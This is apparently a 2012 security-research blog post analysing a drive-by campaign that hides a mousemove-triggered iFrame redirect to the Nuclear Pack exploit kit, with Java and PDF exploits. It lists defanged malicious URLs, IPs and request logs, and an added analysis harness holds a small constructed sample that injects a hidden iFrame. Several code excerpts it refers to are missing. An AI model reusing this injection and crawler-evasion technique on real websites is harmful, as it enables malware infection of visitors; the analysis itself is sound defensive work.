Exploit Kit plays with smart redirection (amended)

This week we have discovered another interesting attack vector. This time cybercriminals are using an interesting technique for hiding malicious JavaScripts and avoiding visible iFrame injection. At this moment we are tracking hundreds of infected legitimate web sites in the Russian segment of the internet using this technique of infection. Let's investigate this attack method step by step. (Since original publication there have been several updates to this story; they are at the bottom of this page.)

If we look at the code of an infected webpage, we can find only one JavaScript file reference. No malicious iFrame is visible in the source code of the infected webpage. In the next stage of the analysis we downloaded this JavaScript code from one of the infected sites (hxxp://winfield-oil.ru/javascript/script.js) for further analysis.

After analysis we find the interesting JavaScript function below, using the strange domain name hxxp://onj42a.qpoctushpm.is-an-actor.com/g/: this script is downloaded and executed in the next phase of the attack.


Looking inside this script, we find some really interesting results. Inside the script a large block of code is obfuscated with a permutative encoding algorithm.

After deobfuscation the malicious iFrame code looks like this:

The code block inside the iFrame redirects us to the latest version of the Nuclear Pack exploit kit (originally reported here as Blackhole; see the update at the bottom of this page).

We have tracked some interesting activity by the injected code block with iFrame redirection: JavaScript code is used to capture mouse activity with the onmousemove event, and only after that does the malicious activity continue with the redirection. This enabled us to identify a simple method being used to bypass the crawlers used by AV companies and others. These are the first steps towards the criminals' active detection of real user activity, for tracking detections and bypassing malware collection by whitehat crawlers.
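The crawler-side consequence of that event gating, as an added example that is not code from the original post: a tiny analysis harness with a constructed fake DOM loads a script, checks what a crawler sees without any user activity, then dispatches a synthetic mousemove and checks again. The sample script and the placeholder landing URL are constructed for this example.

```javascript
// Added example (not from the original post): why a crawler that never fires
// user events misses an event-gated iFrame injection, and how dispatching a
// synthetic mousemove during analysis surfaces it. The fake DOM below supports
// only what the check needs; it is not a real browser.
function makeFakeDocument() {
  const listeners = {};
  const body = { children: [], appendChild(el) { this.children.push(el); return el; } };
  const doc = {
    body,
    onmousemove: null,
    addEventListener(type, fn) { (listeners[type] = listeners[type] || []).push(fn); },
    createElement(tag) { return { tagName: tag.toUpperCase(), src: '', style: {} }; },
    // Synthetic user event: fires both addEventListener handlers and the on<type> property.
    dispatch(type) {
      (listeners[type] || []).forEach((fn) => fn({ type }));
      if (typeof doc['on' + type] === 'function') doc['on' + type]({ type });
    },
    injectedFrames() {
      return body.children.filter((el) => el.tagName === 'IFRAME').map((el) => el.src);
    },
  };
  return doc;
}

// Constructed stand-in for the redirector described above: the hidden iFrame is
// only appended once the visitor moves the mouse. The URL is a placeholder.
const SAMPLE_SCRIPT = `
  document.onmousemove = function () {
    var f = document.createElement('iframe');
    f.src = 'http://landing.example.invalid/main.php'; // placeholder host
    f.style.display = 'none';
    document.body.appendChild(f);
  };
`;

// Runs the script against the fake document and reports whether the injection
// is gated on user activity, plus the iFrame sources seen after the event.
function analyse(scriptSource) {
  const doc = makeFakeDocument();
  new Function('document', scriptSource)(doc); // script only sees the fake DOM
  const framesBefore = doc.injectedFrames().length;
  doc.dispatch('mousemove');                   // the countermeasure: fake activity
  const frames = doc.injectedFrames();
  return { gatedOnUserEvent: framesBefore === 0 && frames.length > 0, frames };
}

console.log(analyse(SAMPLE_SCRIPT));
```

A sandbox that fires no synthetic events reports zero iFrames for this script, which is exactly the blind spot the post describes.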

If we look at the JavaScript code for exploiting the new Java vulnerability CVE-2012-0507, we find that a remote Java applet is called using special parameters.

At the next stage of the exploitation process, the malicious Java applet at hxxp://094t8g.qktsnwukvi.webhop.net//images/274e0118278c38ab7f4ef5f98b71d9dc.jar (Java/Exploit.CVE-2012-0507.J) uses these parameters for decoding a URL with the executable file payload. Without this parameter the URL can't be decoded and the next step of the attack can't be followed.

The structure of objects in the Java/Exploit.CVE-2012-0507.J sample looks like this:

The special parameter needed for decoding the URL (hxxp://094t8g.qktsnwukvi.webhop.net/server_privileges.php?7e9f0e75503391ed492e5abe22e1989e=2) serving the payload (in this case it was Win32/TrojanDownloader.Carberp.AH) is found in the method MyStart(String paramString), which holds the decoding algorithm.

If the Java version on the client side is not vulnerable, then the Blackhole JavaScript tries instead to attack using the PDF exploit JS/Exploit.Pdfka.PJN (CVE-2010-0188):

Attackers search for ways to extend the lifetime of each obfuscation iteration or each infection of a legitimate website. It's a natural evolution for drive-by download attacks to include malicious code employing active techniques for detecting real user activity and bypassing malware collection systems.

All malicious domains at the time of publication are hosted in a network belonging to Leksim Ltd/RELNET-NET AS5577.

It's not the first time this hosting provider has been involved in such activities; in April last year we were already seeing incidents originating from this network.

Here's a list of the more active domains over 24 hours:


Special thanks to Vladimir Kropotov, independent security researcher from Russia, for some of the information used for this post.

Aleksandr Matrosov
David Harley

Updates:

(1) Aleks reports:

On April 3rd IPs with Blackhole migrated onto the latest version of Nuclear Pack.

Proof logs:

  • 02/Apr/2012  GET hxxp://dx6ts.yfwumdwyei.is-a-hunter.com/g/3854063525500425.js  62.122.79.32
  • 02/Apr/2012  GET hxxp://yfwumdwyei.is-a-hunter.com/main.php?page=4f086f0830a83d5f  62.122.79.32 [Blackhole]
  • 03/Apr/2012  GET hxxp://094t8g.qktsnwukvi.webhop.net/g/017432546059324.js  62.122.79.41
  • 03/Apr/2012  GET hxxp://qktsnwukvi.webhop.net/main.php?page=4f086f0830a83d5f  62.122.79.41 [Blackhole]
  • 03/Apr/2012  GET hxxp://pqiyoc.qktsnwukvi.webhop.net/g/697079368134578.js  62.122.79.41
  • 03/Apr/2012  GET hxxp://094t8g.qktsnwukvi.webhop.net/server_privileges.php?e843aac68e6c4d6126926e60a1781536=2  62.122.79.41 [Nuclear Pack]

(2) Steve Burn points out that AS5577 is actually Root eSolutions/Root SA: Leksim is one of their customers. A post at http://hphosts.blogspot.co.uk/2009/11/crimeware-friendly-isps-root-esolutions.html refers.

[Further update: there's a useful report of a major Nuclear Pack-related incident from Fox-IT at http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/. However, in the case that Aleksandr has been looking at, there's an updated version that includes Java/Exploit.CVE-2012-0507.]

[Update: it turns out that it's not Blackhole, but Nuclear Pack Version 2.0. Our apologies for the confusion. I'm hoping we'll have more information for you shortly.]
